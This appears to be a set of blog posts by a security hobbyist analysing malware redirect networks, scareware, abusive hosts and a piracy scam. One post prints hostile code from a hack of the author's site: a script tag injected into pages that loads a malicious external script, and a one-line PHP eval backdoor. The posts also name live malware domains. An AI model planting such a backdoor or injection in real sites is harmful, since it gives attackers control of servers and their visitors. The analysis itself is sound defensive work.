Mapping a network of malware sites, and a distressing discovery

Right now, Eve and I are in the remote cabin in the woods where we wrote More Than Two, working on two new books: a nonfiction book called Love More, Be Awesome and a novel called Black Iron.

The cabin has very limited Internet access that’s approximately the same speed as old-fashioned dialup, so fetching email is always a bit dicey. Imagine my disappointment at the timing, then, of a large-scale malware attack.

The emails are all very simple: just two lines and a bit.ly URL shortener address. They come from a wide range of IP addresses with a large number of different forged From: addresses, and they all look exactly the same:

The system behind this email, however, is anything but simple.


The Network

The emails all contain a URL shortening address that uses the popular bit.ly URL shortener service. There’s a complex network behind that short URL, that does a number of different things: promotes dodgy products such as supposed “brain boosting” pills, and attempts to download malware and trick people into phoning phony tech support Web sites that scam victims for hundreds of dollars in fake tech support charges (and also dupe victims into downloading more malware).

*** WARNING *** WARNING *** WARNING ***

All the sites mentioned in this post are live at the time of writing this. Most of them will attempt to download malware or redirect you to sites that attempt to download malware. Do not visit these sites if you don’t know what you’re doing.

When you click the link in one of these emails, you’re redirected via several steps to a site called wholesoil.com that then sends you off to one of many, many possible destinations, some of which are typical run-of-the-mill spam sites and some of which are malware sites. The network looks like this:

This chart is not complete; there are many, many other malware sites that you may be redirected to. I charted well over a dozen more such sites before I quit looking.

Clicking on the link contained in the email enters you into a lottery of suck: Will you get spam? Will you get pwn3d? Hard to say!

I’m not 100% certain it’s entirely random. There may be some element of looking at the browser’s user agent or the visitor’s IP address; visiting wholesoil.com repeatedly in a short span of time will tend to result in getting redirected to the same spam URL over and over after a while.

The people behind this network have gone to considerable lengths to hide themselves. For example, one step of the redirection happens via a domain parking service called tracted.net. The redirection script that relays traffic through this site scrubs the referrer header. When you travel from one Web site to another, your browser sends a “referrer header” that tells the new site where you came from; this is how people can tell where they’re getting traffic from. But this network carefully removes that information, so that the owners of tracted.net can not easily detect this traffic.

The most common spam destination is a subdomain on a site called fastgoodforms.com. These subdomains change often: 570-inteligen.fastgoodforms.com, 324-brain.fastgoodforms.com, 923-inteligen.fastgoodforms.com, and so on.

But more often than spam, users will get redirected to a phony tech support page that displays a fake Windows error message. These sites look like this:

These sites attempt to download malware—specifically, a remote control program that allows attackers to take control of an infected computer. They also attempt to prevent the user’sWeb browser from leaving the site, and display popups over and over and over again telling the user that the computer has been infected by a virus and to call Microsoft Support at a toll-free number.

The toll-free number is owned and operated by the scammers. If you call it, you’re sent to a person in India who will attempt to get your credit card number, and will try to talk you into installing software on your computer to “fix” the “problem.” This software is, of course, remote control malware.


How the mighty fall

While I was tracing out this network, I discovered many, many, many of these fake tech support Web sites that are being used to spread malware and try to con users.

And that’s where I noticed an interesting pattern.

The overwhelming majority of these malware sites are hosted, not on dodgy services in China or the Netherlands as you might normally expect, but on GoDaddy.

Not all of the malware sites are hosted on GoDaddy (I found one hosted on One, one hosted on Hostwinds, and one on IX Web Hosting, for example), but the vast majority—literally dozens—are.

I believe that GoDaddy is the choice of malware hosts because their abuse and security teams, which once upon a time had an excellent reputation in the Web hosting industry, have been pared back to the point they can no longer keep up…or perhaps simply no longer care. (GoDaddy was bought out by an investment group a few years back, which is when its reputation began to decline.)

I reported the Hostwinds-hosted malware site to Hostwinds abuse; it was removed about ten hours later. I reported the malware site on IX Web Hosting; it was gone in 17 minutes. But malware and phish sites on GoDaddy remain, in my experience, for an average of about a month before GoDaddy acts, and spam sites remain essentially forever.

Spammers and malware distributors are adaptable. They move Web hosts often, leaving hosting companies that take rapid action against them and congregating on tolerant sites that permit spam and malware. I suspect the fact that so many malware and fake tech support sites are hosted on GoDaddy is a consequence of the indifference or inability of their abuse and security teams.

To be fair, if you make enough noise, GoDaddy will eventually act. I have engaged with GoDaddy on Twitter, and when I do that, they will generally take down a site I complain about within a few days. The dozens of other sites, however, remain.


I am currently a GoDaddy customer. I do not use GoDaddy for Web hosting, but I do have a large number of domains registered there. I intend to begin removing my domains from GoDaddy, because I do not like supporting spam-tolerant companies. (Ironically, this was the reason I left Namecheap to go to GoDaddy; Namecheap is owned by a company called Rightside, that has become notorious for willingly hosting some of the biggest players in the spam business.)

So if you have a domain registrar you use, please leave a comment! I would love to find a replacement for GoDaddy and pull all my domains away from them. (If you’re using GoDaddy for Web hosting or domains, I advise you to do likewise, unless you fancy staying with a company whose approach to security and malware is so lax.)

I would also like to invite GoDaddy representatives to offer their side of the story in the comments as well.

MacKeeper: The Gift that Keeps On Giving

Stop me if you’ve heard this one before:

A shady, disreputable company makes a dodgy bit of software they claim will protect a computer from malware, but that actually does nothing (at best) or harms your computer (at worst). They sell this software by creating fake Web sites that throw up phony “virus warnings” to visitors pushing the dodgy software, then use a number of devious and underhanded tricks to steer traffic to the fake antivirus pages. They get caught, they find themselves on the receiving end of a class-action lawsuit, and they sell the software to a new company, which promises to clean up its act but which ends up doing exactly the same thing.

If you’re a Mac user, you probably recognize this story. It’s the story of MacKeeper, a bogus bit of software that bills itself as a security and general cleanup app.

MacKeeper is a bit of software with a long and ignoble history. It was originally written by a company called Zeobit, which was so aggressive in marketing the software by shady means that it got hammered with a $2 million settlement in a class action lawsuit. Business Insider magazine has recommended that users stay away from it.

In 2013, a company called Kromtech bought MacKeeper from Zeobit. Kromtech claims to be a German company, but it’s incorporated in the Virgin Islands and all its owners are in the Ukraine. And Kromtech is continuing the practice of pushing the software with phony antivirus sites and fake claims.

The scam works like this:

Booby-trapped ads on legitimate Web sites and redirectors placed on hacked Web sites steer users to fake antivirus pages. These antivirus pages, which live at URLs that look like official Apple URLs, pop up phony warnings of non-existent viruses.

These Web sites attempt to prevent you from leaving, and pop up alert box after alert box warning of a completely phony virus.

When you click on the button to do a “virus scan,” you are shown–surprise!–a report that says your system is infected.

The supposed “tapsnake virus” that this warning talks about is bogus. Tapsnake does not exist; it is a scareware scam used to frighten naive computer and smartphone users into thinking they are infected with a virus.

And, naturally, when you click the “Remove Virus Now” button, you’re taken to…wait for it…

Meet the new MacKeeper owners, same as the old MacKeeper owners.

I’ve seen a considerable uptick in phony antivirus sites trying to con people into buying MacKeeper lately, particularly in the last six weeks.

There is no Tapsnake virus, and your Mac is not infected. It’s a con, designed to sell you a worthless piece of software.

Stay safe out there in cyberspace.

WordPress security issues: this is a bad one, folks

It’s been a bad week for WordPress. If you’re a WordPress user, I highly recommend you check as soon as possible to ensure your site is updated, all your plugins are up to date, and your site is free of unexpected users and malicious combat.

WordPress 4.4.2 was released February 2. This release fixes two known security flaws.

Hot on the heels of this security release come two worrying developments. The first, reported on over at the Wordfence blog, concerns a new WordPress attack platform that makes it easier than ever for criminals to attack WordPress sites. From the article:

The attack platform once fully installed provides an attacker with 43 attack tools they can then download, also from pastebin, with a single click. The functionality these tools provide includes:

  • Complete attack shells that let attackers manage the filesystem, access the database through a well designed SQL client, view system information, mass infect the system, DoS other systems, find and infect all CMS’s, view and manage user accounts both on CMS’s and the local operating system and much more.
  • An FTP brute force attack tool
  • A Facebook brute force attacker
  • A WordPress brute force attack script
  • Tools to scan for config files or sensitive information
  • Tools to download the entire site or parts thereof
  • The ability to scan for other attackers shells
  • Tools targeting specific CMS’s that let you change their configuration to host your own malicious code

The post includes a video of the attack platform in action.

Second, from Ars Technica, is a report of WordPress sites being hacked and made to download ransomware to visitors’ computers.

It’s not currently clear how the sites are being compromised, but it may be via an unknown zero-day security exploit. From the article:

According to a Monday blog post published by website security firm Sucuri, the compromised WordPress sites he observed have been hacked to include encrypted code at the end of all legitimate JavaScript files. The encrypted content is different from site to site…

It’s not yet clear how the WordPress sites are getting infected in the first place. It’s possible that administrators are failing to lock down the login credentials that allow the site content to be changed. It’s also feasible that attackers are exploiting an unknown vulnerability in the CMS, one of the plugins it uses, or the operating system they run on. Once a system is infected, however, the website malware installs a variety of backdoors on the webserver, a feature that’s causing many hacked sites to be repeatedly reinfected.

What can you do to protect your WordPress site? If you’re running WordPress, I strongly, strongly urge you to do the following:

  • Use strong admin passwords! I can not emphasize this enough. Use strong admin passwords! Criminals use automated tools to scan thousands of WordPress sites an hour looking for weak passwords. A normal WordPress install will be scanned dozens to hundreds of times a day. Use strong admin passwords!
  • Update all your sites RELIGIOUSLY. When a WordPres security patch is released, criminals will go to work examining the patch to see what it fixes, then develop automated tools to automatically hack unpatched sites. You may have only 24-48 hours between when a security patch comes out and when people start using tools that will automatically compromise sites that haven’t installed the patch. Turn on automatic updates. Keep on top of your site.
  • Install a tool like WordFence. This free plugin will protect your site by locking out people who use known attack tools or brute-force password guessing attempts. It will notify you by email of hack attempts and updates that need to be installed.
  • Install a tool like WPS Hide Login to move your login page to a hidden location, like /mysecretlogin instead of /wp-login.php. This will go miles toward securing your site.

I highly recommend you install the free Infinite WP tool as well. It’s a plugin plus a Web app that will notify you of updates and allow you to update one or many WordPress sites with just one button click. This is a great way to keep on top of security patches.

Also, absolutely do not assume you’re safe because you’re an obscure little blog that nobody cares about. The criminals will still find you. They use totally automated tools to scan for vulnerable WordPress sites looking for installations to exploit. It doesn’t matter if only you and your mom know about your site–criminals will find it and will exploit it.

Stay safe!

Namecheap: Why I’m moving away from them

I have a rather extensive collection of Web sites, where I write about everything from photography to transhumanism to sex. As a result, I have rather a lot of domain names, which until recently I’ve registered with Namecheap, as they have in the past been cheap and reasonably reliable.

However, I have begun the painful and expensive process of moving off Namecheap, and I recommend others do the same. There are two interrelated reasons for this, the first having to do with poor support and training (Namecheap employees don’t appear to know the differnce between a domain and a subdomain, which is rather a serious problem when you’re in the business of domains) and the second having to do with support for spam and malware (largely on account of the first).

The story is long and complicated, but it begins many months ago with a spam email advertising life insurance, which was plugging a domain hosted on Namecheap Hosting.

Namecheap, in addition to being a domain registrar (well, technically a reseller for a registrar called Enom), is also a Web hosting company. If you’re a Web hosting company, sooner or later a spammer will host a Web site with you. How you react when you receive abuse reports will determine how popular you are with spammers. If you react quickly, spammers will avoid you. If you allow the site to remain up, spammers will talk, and soon other spammers will flock to you. If you continue to leave spam domains up, pretty soon spammers will start choking out your other customers.

Anyway, it happens. A spammer found Namecheap Hosting. I hadn’t seen much spam on Namecheap before, so I fired off an abuse report and that was the end of it.

Or so I thought. But then things took a turn for the strange.

A couple of days later, I received an email from Namecheap abuse saying “we aren’t hosting this domain, go complain to someone else.” Now, that happens from time to time as well; spammers will sometimes hop from one host to the next, so by the time a host receives a complaint, the spammer’s Web site has been moved and they’re not hosting it any more.

I looked at the domain. Still hosted on Namecheap. I wrote back saying “no, it’s definitely hosted by you guys; here’s the IP address, 162.255.119.254. That address is in your space.”

And got back a second email: “We’re not hosting this site.”

“Huh,” I thought, “that’s strange. Maybe the site is hosted on many IP addresses?” That’s another spam tactic, putting a Web site on a bunch of hosts and then changing the IP address constantly. But no, the site had only ever been hosted by Namecheap.

I replied and said “no, here’s the DNS entry, ere’s the history for the site, you’re definitely hosting it.” And got back yet another reply: “no we’re not.”

And then something even weirder happened.

I started getting tons of spam advertising domains pointing to Namecheap’s IP address space. Tons. Spam advertising life insurance, promoting Bitcoin schemes, advertising phony “cures” for diabetes. Spam pitching window replacement services, Amazon gift cards, Russian dating sites, and home refinancing.

And I’d seen this spam before. It was word-for-word and image-for-image identical to spam from well-known, infamous spam purveyors that had always, until now, advertised sites hosted in Russia, Columbia, and the Ukraine–places that tend to permit spam hosting.

I started getting multiple pieces of this spam a day. Then dozens. All of it advertising domains on Namecheap IP addresses.

  
Left: Old spam advertising a site hosted in Eastern Europe. Right: Recent spam advertising a site on Namecheap.

I sent spam reports to Namecheap…and Namecheap’s abuse team kept sending responses saying “we aren’t hosting these sites.”


This is the point where I learned that Namecheap, a company that sells domain names, does not understand how a domain name works.

A typical domain name has three (or more) parts. The parts are separated by periods. Let’s look at an example:

www.morethantwo.com

Going from right to left: The last part is called a “top level domain,” or “TLD”. It’s things like “.com” or “.net” or a country-specific code like “.ca” (for Canadian sites). The UK uses “.co.uk” for various historical reasons.

The part before the TLD, in this case morethantwo, is the domain name.

The part at the very beginning, in this case www, is a subdomain. The subdomain “www” stands for “World Wide Web” and it’s the most common subdomain by far. But you can make a subdomain be anything you want. You could set up your Web site at “polyamory.morethantwo.com” or “groupsexisawesome.morethantwo.com” or anything else you like.

And here’s the important part:

You can put a subdomain on a completely different server, hosted by a completely different Web host.

For example, morethantwo.com is hosted by Incubus Web hosting. But if I wanted to, I could put “polyamory.morethantwo.com” on Dreamhost and “groupsexisawesome.morethantwo.com” on Softlayer–each subdomain can get its own IP address and its own Web server, if you want.

Now you might not know that, and you can be excused for not knowing that. It’s not necessary to understand how the Internet works in order to use it.

But Namecheap should know that. They sell domain names. This is what they do.

It’s okay if a person who owns a car doesn’t know that a car’s engine has more than one spark plug in it, but no professional mechanic should ever be ignorant of that simple fact. It’s okay if a person who uses the Web, or even a person who owns a Web site, doesn’t know that subdomains can be hosted on one IP address. It’s unforgivable that a domain registrar doesn’t know that.

In this case, the spammer is using domain names that look like

view1.gnrlbshomes.us

“view1” is a subdomain, hosted by Namecheap. The main domain,gnrlbshomes.us, is hosted elsewhere. Namecheap’s abuse team doesn’t know how that works. When they received the spam complaint, they didn’t look at view1.gnrlbshomes.us, they only looked at gnrlbshomes.us.

When I figured out what was happening, a light dawned. I fired off a reply explaining that view1.gnrlbshomes.us and gnrlbshomes.us were hosted at differnt IP addresses, and they were hosting the actual spamvertised URL, view1.gnrlbshomes.us.

Problem solved, right? They simply missed the subdomain, right? Wrong.

Elena, it seems, didn’t talk to Kate. Namecheap has a systemic problem. This isn’t someone not noticing the subdomain, this is someone not knowing how domains work.

And I got a lot of these emails, from all different people: “The domain ‘blah blah blah’ isn’t hosted by Namecheap.”

At this point, I was convinced the problem was incompetence…and a bizarre incompetence, an incompetence on the level of a professional auto mechanic not understanding that an engine has more than one spark plug.

But then, things took a turn for the even weirder.

I patiently replied to each of the emails, showing the IP address of the main domain and the subdomain, and that the subdomain was in fact on Namecheap IP space.

And then I started getting replies like this:

Essentially, what this says is “if you don’t actually send email from a Namecheap server, you’re welcome to spam a domain that lives in Namecheap space and we’re A-OK with that.”

Now, spammers almost never send emails from the same servers their Web sites live on. Usually, spammers send emails from home computers that are infected with viruses without their owner’s consent (a lot of computer viruses are written for profit; the virus authors infect computers with software that allows them to remotely control the computers, then sell lists of infected computers to spammers, who use the infected computers to send spam email.) Sometimes, the spam emails are sent from “bulletproof” spam mail servers in places like the Ukraine. But they almost never come from the same computer that’s hosting a site.

So Web hosting companies want to see a spam with full headers when you report spam, so they can verify that, yep, this is a spam email, and shut down the Web site that’s being spamvertised.

But not Namecheap. Namecheap will knowingly and willingly allow you to spam domains on their servers, provided the spam email doesn’t actually come from the same server.

I asked if their policy was to permit spam that doesn’t originate from the same server as the Web site, I received this reply:

Which to me looks like a “yes.”

At the moment, I am currently receiving 11 spam emails a day advertising domains that resolve to Namecheap IP addresses. There are about half a dozen products being spamvertized; each day’s crop of spam messages are word for word and image for image identical to the previous day’s, but the domains are different. Clearly, the spammers feel they’ve found a good home in Namecheap.

So I took a look at that IP address, 162.255.119.254. It’s quite a mess.

Domains on 162.255.119.254 are all forwarded; that is, 162.255.119.254 is a pass-along to other IP addresses. If you want to put up a Web site and you don’t want anyone to know who’s really hosting it, you can put it there, and visitors will be invisibly passed along to its real home.

Now, can you guess what sort of thing that’s useful for?

If you said “spam and malware!” you’re absolutely right. A Virustotal analysis of 162.255.119.254 shows that it’s being used to spread a lot of bad stuff:

And it’s not just Virustotal. A Google search for 162.255.119.254 shows that it has a reputation as a bad neighborhood in a lot of places. It’s listed as a bad actor in the Cyberwarzone list:

and as a virus distributor in the Herdprotect list:

At this point, I got tired of making screenshots, but basically this Namecheap server has a bad reputation everywhere.

So whether through gross incompetence or active malice, Namecheap is running a server that’s a haven for spammers and malware distribution.

Which is why I’ve begun pulling my domain name registrations from them. I can not in good conscience spend money to support a company that’s such a menace to the Internet, and I spend about $500 a year in registrations.

Now, interestingly, I’m averaging about 11 spam emails a day advertising domains on Namecheap’s IP space, but I’m averaging 20 spam emails a day that are word for word identical to these but aren’t advertising a domain on Namecheap.

The ones that are advertising domains not on Namecheap are advertising domains hosted by a company called Rightside.co, a Web host I’m not familiar with.

As I mentioned before. Namecheap is a reseller for a registrar called Enom. And Rightside.co, well…

The fact that the same spammer is using Namecheap and Rightside, and they’re both front-ends for Enom, is interesting. Stay tuned!

Cloudflare: The New Face of Bulletproof Spam Hosting

…or, why do I get all this spam, and who’s serving it?

Spammers have long had to face a problem. Legitimate Web hosting companies don’t host spam sites. Almost all Web hosts have policies against spam, so spammers have to figure out how to get their sites hosted. After all, if you can’t go to the spammer’s website to buy something, the spammer can’t make money, right?

In the past, spammers have used overseas Web hosting companies, in countries like China or Romania, that are willing to turn a blind eye to spam in exchange for money. A lot of spammers still do this, but it’s becoming less common, as even these countries have become increasingly reluctant to host spam sites.

For a while, many spammers were turning to hacked websites. Someone would set up a WordPress blog or a Joomla site but wouldn’t keep on top of security patches. The spammers would use automated tools capable of scanning hundreds of thousands of sites looking for vulnerabilities and hacking them automatically, then they’d place the spam pages on the hacked site. And a lot of spammers still do this.

But increasingly, spammers are turning to the new big thing in bulletproof spam serving: content delivery networks like Cloudflare.


What is a content delivery network?

Basically, a content delivery network is a bunch of servers that sit between a traditional Web server and you, the Web user.

A ‘normal’ Web server arrangement looks something like this:

When you browse the Web, you connect directly to a Web server over the Internet. The Web server takes the information stored on it and sends it to your computer.

With a content delivery network, it looks more like this:

The CDN, like Cloudflare, has a large number of servers, often spread all over the country (or the globe). These servers make a copy of the information on the Web server. When you visit a website served by a CDN, you do not connect to the Web server. You connect to one of the content delivery network servers, which sends you the copy of the information it made from the Web server.

There are several advantages to doing this:

1. The Web server can handle more traffic. With a conventional Web server, if too many people visit the Web site at the same time, the Web server can’t handle the traffic, and it goes down.

2. The site is protected from hacking and denial-of-service attacks. If someone tries to hack the site or knock it offline, at most they can affect one of the CDN servers. The others keep going.

3. It’s faster. If you are in Los Angeles and the Web server is in New York, the information has to travel many “hops” through the Internet to reach you. If you’re in Los Angeles and the content delivery network has a server in Los Angeles, you’ll connect to it. There are fewer hops for the information to pass through, so it’s delivered more quickly.


Cloudflare and spam

Spammers love Cloudflare for two reasons. First, when a Web server is behind Cloudflare’s network, it is in many ways hidden from view. You can’t tell who’s hosting it just by looking at its IP address, the way you can with a conventional Web server, because the IP address you see is for Cloudflare, not the host.

Second, Cloudflare is fine with spam. They’re happy to provide content delivery services for spam, malware, “phish” sites like phony bank or PayPal sites–basically, whatever you want.

Cloudflare’s Web page says, a little defensively, “CloudFlare is a pass-through network provider that automatically caches content for a limited period in order to improve network performance. CloudFlare is not a hosting provider and does not provide hosting services for any website. We do not have the capability to remove content from the web.” And, technically speaking, that’s true.

Cloudflare doesn’t own the Web server. They don’t control what’s on it and they can’t take it offline. So, from a literal, technical perspective, they’re right when they say they can’t remove content from the web.

They can, however, refuse to provide services for spammers. They can do that, but they don’t.


History

CloudFlare was founded by Matthew Prince, Lee Holloway, and Michelle Zatlyn, three people who had previously worked on Project Honey Pot, which was–ironically–an anti-spam, anti-malware project.

Project Honey Pot allows website owners to track spam and hack attacks against their websites and block malicious traffic. In an interview with Forbes magazine, Michelle Zatlyn said:

“I didn’t know a lot about website security, but Matthew told me about Project Honey Pot and said that 80,000 websites had signed up around the world. And I thought ‘That’s a lot of people.’ They had no budget. You sign up and you get nothing. You just track the bad guys. You don’t get protection from them. And I just didn’t understand why so many people had signed up.”

It was then that Prince suggested creating a service to protect websites and stop spammers. “That’s something I could be proud of,’” Zatlyn says. “And so that’s how it started.”

So Cloudflare, which was founded with the goal of stopping spammers by three anti-spam activists, is now a one-stop, bulletproof supplier for spam and malware services.


The problem

Cloudflare, either intentionally or deliberately, has a broken internal process for dealing with spam and abuse complaints. Spamcop–a large anti-spam website that processes spam emails, tracks the responsible mail and Web hosts and notifies them of the spam–will no longer communicate with Cloudflare, because Cloudflare does not pay attention to email reports of abuse even though it has a dedicated abuse email address (that’s often unworkakble, as Cloudflare has in the past enabled spam filtering on that address, meaning spam complaints get deleted as spam).

Large numbers of organized spam gangs sign up for Cloudflare services. I track all the spam that comes into my mailbox, and I see so much spam that’s served by Cloudflare I keep a special mailbox for it.

Right now, about 15% of all the spam I receive is protected by Cloudflare. Repeated complaints to their abuse team, either to their abuse email addres or on their abuse Web form, generally have no effect. As I’ve documented here, Cloudflare will continue to provide services for spam, malware, and phish sites even long after the Web host that’s responsible for them has taken them down; they kept providing services for the malware domain rolledwil.biz, being used as part of a large-scale malware attack against Android devices, for months after being notified.

One of the spam emails in my Cloudflare inbox dates back to November of 2013. The Spamvertised domain, is.ss47.shsend.com, is still active, nearly a year after Cloudflare was notified of the spam. A PayPal phish I reported to CloudFlare in March of 2014 was finally removed from their content delivery network three months later…after some snarky Twitter messages from Cloudflare’s security team.

(They never did put up the interstitial warning, and continued to serve the PayPal phish page for another month or more.)

Cloudflare also continues to provide services for sites like masszip.com, the Web site that advertises pirated eBooks but actually serves up malware.

In fact, I’ve been corresponding with a US copyright attorney about the masszip.com piracy, and he tells me that Cloudflare claims immunity from US copyright law. They claim that people using the Cloudflare CDN aren’t really their concern; they’re not hosting the illegal content, they’re just making a copy of it and then distributing it, you see. Or, err, something.

I am not sure what happened within Cloudflare to make them so reluctant to terminate their users even in cases of egregious abuse, such as penis-pill spam, piracy, and malware distribution. From everything I can find, it was started by people genuinely dedicated to protecting the Internet from spam and malware, but somehow, somewhere along the way, they dropped the ball.

I wonder if Michelle Zatlyn is still proud.

More Than Two hack

As most of you know, I do computer security as a hobby. (Browse the Computer Security and Computer Viruses tags on this blog to see what I mean.) So it was with a measure of embarrassment I discovered, while at Atlanta Poly Weekend in June, the More Than Two Web site had been hacked.

I first became aware there was a problem when Eve visited the site on her phone and saw this:

I investigated and discovered that malicious code had been added to the bottom of each page, just below the closing body tag. The following code had been injected:

<noindex>
<script src=”http://stat.rolledwil.biz/stat.php?1921853954″>
</script>
</noindex>

I spent the next few hours not going to panels or workshops, but instead looking at logs, talking to my hosting provider, and investigating the source of the attack. Fortunately, an old friend of mine from Atlanta who does computer security professionally happened to be at the convention, and I spent some time talking to him, too.

A malicious file that offered people a back door into the site had been added, and files had been tampered with to inject the hostile code into HTML pages.

I quickly discovered the attack was targeted only at Android browsers, and only certain versions of Android (as near as I can tell, versions equal to or less than 4.0).

The site at stat.rolledwil.biz returned a 404 Not Found whenever I tried to visit it directly. In addition, non-Android mobile browsers and desktop browsers didn’t return the error.

I remove dthe malicious files and the hack, and then set about figuring out what had happened and what its purpose was. What I found was interesting.


The malicious site at stat.rolledwil.biz was served by Cloudflare, the spam and malware sewer that figures prominently in problems I’ve written about here and here. I emailed Cloudflare, and received a terse reply that the actual host was an outfit called Digital Ocean. I emailed them, and they quickly shut down the malware server.

The number that appears after the question mark in the line

<script src=”http://stat.rolledwil.biz/stat.php?1921853954″>

is an encoded version of the IP address of the More Than Two server. Te first thing this script does is check the browser referrer against this encoded IP address. If they aren’t the same, it returns a 404. Basically, it looks to see if the script is being called from a hacked Web site. If it isn’t, then it’s probably a security researcher trying to figure out what the script does, so it sends back a 404.

The next thing it does is look at the browser’s user agent–the thing that tells a Web site what kind of browser you’re using. If it isn’t Android, it also redirects to a 404. The flow looks like this:

So only if the call appears to be coming from an Android browser visiting a hacked Web site does the malicious script get served up. The script produces the alert dialog shown above, and tries to redirect to a URL in Eastern Europe (not functioning at the time I observed this).

The initial attack vector seems to be a variety of the Mayhem worm targeting Web servers. My Web hosting company was apparently vulnerable (the problem has since been fixed), and the exploit was used to drop a malicious PHP file on my server. The PHP file looked like this:

<?php @eval(stripslashes($_REQUEST[ev]));

If you know PHP, you’re probably filled with a sinking feeling of horror and dread looking at that. Basically, it allows a person to execute commands on a Web server from a browser.

From here, the attackers modified the files on the Web server to inject the malicious HTML into Web pages.

The server has been fixed, the CMS I use has been updated, and I’ve taken other steps to ensure against a repeat attack. The attack vector was closed the day after I discovered it, but I haven’t written about the attack prior to this until I had finished analyzing it and had a good understanding of exactly what happened and how it worked.

The fact this attack was as sophisticated as it was and was aimed, not at Windows, but at Android, is interesting.


There’s a postscript to this. The malicious attack site was served up by Cloudflare, the content distribution network with a reckless disregard for security and abuse. I notified the actual Web host, Digital Ocean, about the attack, and they had disabled the site by June 11.

However, a month after being told the site was serving malware and being used as part of a Web attack, and almost a month after the site had been disabled, Cloudflare was still trying to serve its content:

Cloudflare appears indifferent to even the most egregious abuse, and will continue to provide services to abusive Web sites long after they’re notified of the abuse, and even long after the sites’ hosts have shut them down. I’m not quite sure what to make of that, but I’m becoming more and more convinced Cloudflare is a menace to the Internet.

Piracy and More Than Two: Caveat Emptor

This Blog post has been updated; updates are at the end.

Recently, a concerned blog reader sent me an email alerting me to a Web site that claimed to have a free ebook download for More Than Two, the polyamory book Eve and I just finished. He found the link on a YouTube “video” that was basically just a still spam image claiming that the book could be downloaded free, with a Web link in the description. The YouTube page looks like this:

Naturally, I was concerned; Eve and I have put a tremendous amount of work into the book. The eBook isn’t slated to be released until September 2; only our Indiegogo backers have a copy of it, so if it’s leaked, it came from one of our backers.

The download site is a place called masszip.com. It claims to have a huge number of “free” ebooks available for download, all of them pirated versions of books that are most definitely not free.

On the masszip.com page for More Than Two, there is a prominent “Download Now” button. Clicking it causes a “Premium Content” popup to appear:

The popup has several links for various online “surveys” and advertising offers. If you click on one of them, you are taken to another site called cleanfiles.net, which then redirects through a number of affiliate-tracking intermediaries to one of the sites offering “free*” (*particioation required) gift cards, surveys, and the other sorts of flim-flam that fill the scummy and less reputable corners of the Internet.

Both masszip.com and cleanfiles.net are served up by the Cloudflare content delivery network. I’m planning an entire computer security blog post about Cloudflare; they are either completely incompetent or totally black hat, and provide content delivery services for a wide assortment of spammers, malware distributors, and phish pages. (I’ve mentioned Cloudflare’s dysfunctional abuse procedures in a previous blog post.)

I jumped through all the hoops to download a copy of More Than Two, using a disposable email address created just for the purpose. The sites signal cleanfiles.net that you’ve finished the “survey” or filled in an email for an insurance quote or whatever, and then a file downloads.

It’s not necessarily the file you expected, though.

The first time I did this, I got a file that claimed to be an epub, all right, but it wasn’t More Than Two. It was a file called Ebook+ID+53170.rar, which uncompressed into a file called “Words of Radiance – Brandon Sanderson.epub”. Words of Radiance looks to be a real book–a somewhat pedestrian fantasy story about kings and assassins and heroes with secret powers.

The file was not actually an ebook, though. It was actually a Windows executable; and, needless to say, I would not recommend running it. In my experience, Windows expecutable files that mislead you about their names usually have nefarious purposes.

I tried the download again, using a different “survey” link and a different throwaway profile, and ended up being taken to this page:

I’m betting the violation of the Mediafire terms of service probably related to malware.

So basically, the site offers pirated eBooks, but actually makes you fill out surveys and apply for various kinds of insurance quotes and so on, presumably all to make money for the folks who run it. It doesn’t actually deliver the goods, however. Instead, it delivers Windows executables of undetermined provenance that likely don’t do anything you want them to do.

I examined each of the links and discovered the owners of the site are using three different affiliate tracking systems to make money. The affiliate system you’re routed through depends on which link you click. The system looks something like this:

Presumably, they also make money from malicious file downloads.

The site at trk.bluetrackmedia.com is an affiliate tracking site run by Blue Track Media, which bills itself as “The Performance-Based Online Advertising Company.” Typical URLs that run through Blue Track Media look like

http://trk.bluetrackmedia.com/cclick.php?affiliate=3239&campaign=9600&sid=139267348_21118_w_161238&sid3=2859

The people responsible for this scam are identified by the affiliate code “affiliate=3239”.

The site at adworkmedia.com is an affiliate tracking site run by AdWorkMedia, a site that monetizes Web sites using “content locking,” where certain parts of the site are blocked until the visitor does something like fills out a Web survey or gives his email address to an advertiser. Typical URLs that run through AdWorkMedia look like

http://www.adworkmedia.com/go.php?camp=7012&pub=11178&id=15672&sid=&sid2=2736&sid3=LinkLocker&ref=&shortID=198717

t.afftrackr.com is a site registered to a guy named Ryan Schulke. It’s listed as malicious by VirusTotal.

I can’t find out much about quicktrkr.com, except that it’s a new site registered February of this year, 1.quicktrkr.com is hosted on Amazon EC2, and it’s protected by a whois anonymizing service in Panama.

So in short, here’s the scam:

A Web site, masszip.com, promises free stolen eBooks. The site is a front-end for another site, cleanfiles.net, which makes money by using an affiliate system to try to get you to fill out surveys and similar offices. Advertising companies like AdWorksMedia and Blue Track Media pay the site owners whenever you fill out one of these surveys or offers.

If you do this, a file downloads to your system. it will claim to be an eBook (though not the eBook you thought you were getting), but analysis of the file shows it’s actually a Windows executable. The scam is spamvertised via YouTube “videos” that are actually nothing but spam front-ends.

If you’re looking for a copy of our book More Than Two, I suggest you don’t take this route. I understand that waiting for the book to be released on September 2nd might feel like agony (believe me, it does for us too!), but it’s a lot less likely to get your computer infected with malware, and it won’t help line the pockets of scammers at your expense.

Interestingly, some of the advertised sites you end up with if you jump through all the hoops are actually mainstream, big-name companies like Allstate and Publisher’s Clearinghouse, which apparently have no compunction in associating their brands with scams and malware.

UPDATE: The site at t.afftrackr.com appears to be owned by Cake Marketing, and is part of their affiliate tracking system. A Google search for t.afftrackr.com shows a very low confidence in the site, and a number of complaints and dodgy associations.

UPDATE 2 (1-July-2014): The YouTube account of the scammer has been terminated. I received an email this morning from Blue Track Media, saying the affiliate account of the scammers had been closed.

The scam is still active, and it’s now using the affiliate tracking company Adscend Media. Typical URLs used in the links on the scam download page look like

http://adscendmedia.com/click.php?aff=12842&camp=29168&crt=0&prod=3&from=1&sub1=141558590_21118_w_161238&subsrc=2859

I also filed a DMCA report with Cloudflare, and received a reply that basically says “we are a content delivery network, not a conventional Web host, so we don’t have to listen to DMCA reports.” Cloudflare is continuing to provide services to the scam Web sites.

UPDATE 3 (1-July-2014): Only a few hours after I emailed Adscend Media about the scam, I received an email saying they’d also terminated the scammer’s affiliate account.

UPDATE 4 (26-July-2014): I’ve received an email from a person who claims to be working for the Web site masszip.com.

From: Luella Forbes
To: [my franklinveaux dot com address]
Subject: RE: Your book has been taken down
Date: Fri, 25 Jul 2014 04:22:07 +0100

Hello Im Kathyne PAce

I am from masszip.com

